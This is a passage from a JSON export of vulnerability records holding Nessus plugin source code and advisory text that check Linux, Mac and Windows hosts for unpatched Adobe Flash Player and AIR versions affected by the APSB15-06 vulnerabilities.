CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039).\n\n - Double-free vulnerabilities that could lead to code\n execution (CVE-2015-0346, CVE-2015-0359).\n\n - Memory leak vulnerabilities that could be used to bypass\n ASLR (CVE-2015-0357, CVE-2015-3040).\n\n - Security bypass vulnerability that could lead to\n information disclosure (CVE-2015-3044).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=927089\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Adobe Flash Player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.457-113.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.457-113.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.457-113.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.457-2.48.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.457-2.48.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.457-2.48.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:29:47", "description": "The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 17.0.0.134. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)", "edition": 25, "published": "2015-04-14T00:00:00", "title": "Adobe Flash Player <= 17.0.0.134 Multiple Vulnerabilities (APSB15-06)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSA15-06.NASL", "href": "https://www.tenable.com/plugins/nessus/82782", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82782);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-0346\",\n \"CVE-2015-0347\",\n \"CVE-2015-0348\",\n \"CVE-2015-0349\",\n \"CVE-2015-0350\",\n \"CVE-2015-0351\",\n \"CVE-2015-0352\",\n \"CVE-2015-0353\",\n \"CVE-2015-0354\",\n \"CVE-2015-0355\",\n \"CVE-2015-0356\",\n \"CVE-2015-0357\",\n \"CVE-2015-0358\",\n \"CVE-2015-0359\",\n \"CVE-2015-0360\",\n \"CVE-2015-3038\",\n \"CVE-2015-3039\",\n \"CVE-2015-3040\",\n \"CVE-2015-3041\",\n \"CVE-2015-3042\",\n \"CVE-2015-3043\",\n \"CVE-2015-3044\"\n );\n script_bugtraq_id(\n 74062,\n 74064,\n 74065,\n 74066,\n 74067,\n 74068,\n 74069\n );\n\n script_name(english:\"Adobe Flash Player <= 17.0.0.134 Multiple Vulnerabilities (APSB15-06)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 17.0.0.134. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 17.0.0.169 or later.\n\nAlternatively, Adobe has made version 13.0.0.281 and 11.2.202.457\navailable for those installations that cannot be upgraded to 17.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player domainMemory ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"17.0.0.134\";\n fix = \"17.0.0.169\";\n}\nelse\n{\n cutoff_version = \"13.0.0.277\";\n fix = \"13.0.0.281\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:05:25", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-06 listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-0346, CVE-2015-0347,\nCVE-2015-0348, CVE-2015-0349, CVE-2015-0350, CVE-2015-0351,\nCVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\nCVE-2015-0356, CVE-2015-0358, CVE-2015-0359, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3039, CVE-2015-3041, CVE-2015-3042,\nCVE-2015-3043)\n\nA security bypass flaw was found in flash-plugin that could lead to\nthe disclosure of sensitive information. (CVE-2015-3044)\n\nTwo memory information leak flaws were found in flash-plugin that\ncould allow an attacker to potentially bypass ASLR (Address Space\nLayout Randomization) protection, and make it easier to exploit other\nflaws. (CVE-2015-0357, CVE-2015-3040)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.457.", "edition": 28, "published": "2015-04-16T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2015:0813)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-0813.NASL", "href": "https://www.tenable.com/plugins/nessus/82812", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0813. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82812);\n script_version(\"1.30\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_bugtraq_id(74062, 74064, 74065, 74066, 74067, 74068, 74069);\n script_xref(name:\"RHSA\", value:\"2015:0813\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2015:0813)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-06 listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-0346, CVE-2015-0347,\nCVE-2015-0348, CVE-2015-0349, CVE-2015-0350, CVE-2015-0351,\nCVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\nCVE-2015-0356, CVE-2015-0358, CVE-2015-0359, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3039, CVE-2015-3041, CVE-2015-3042,\nCVE-2015-3043)\n\nA security bypass flaw was found in flash-plugin that could lead to\nthe disclosure of sensitive information. (CVE-2015-3044)\n\nTwo memory information leak flaws were found in flash-plugin that\ncould allow an attacker to potentially bypass ASLR (Address Space\nLayout Randomization) protection, and make it easier to exploit other\nflaws. (CVE-2015-0357, CVE-2015-3040)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.457.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3040\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3041\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3044\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0355\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3038\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0813\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.457-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.457-1.el6_6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:14:07", "description": "According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)", "edition": 26, "published": "2015-06-12T00:00:00", "title": "Adobe AIR <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB15-06.NASL", "href": "https://www.tenable.com/plugins/nessus/84156", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84156);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-0346\",\n \"CVE-2015-0347\",\n \"CVE-2015-0348\",\n \"CVE-2015-0349\",\n \"CVE-2015-0350\",\n \"CVE-2015-0351\",\n \"CVE-2015-0352\",\n \"CVE-2015-0353\",\n \"CVE-2015-0354\",\n \"CVE-2015-0355\",\n \"CVE-2015-0356\",\n \"CVE-2015-0357\",\n \"CVE-2015-0358\",\n \"CVE-2015-0359\",\n \"CVE-2015-0360\",\n \"CVE-2015-3038\",\n \"CVE-2015-3039\",\n \"CVE-2015-3040\",\n \"CVE-2015-3041\",\n \"CVE-2015-3042\",\n \"CVE-2015-3043\",\n \"CVE-2015-3044\"\n );\n script_bugtraq_id(\n 74062,\n 74064,\n 74065,\n 74066,\n 74067,\n 74068,\n 74069\n );\n\n script_name(english:\"Adobe AIR <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, 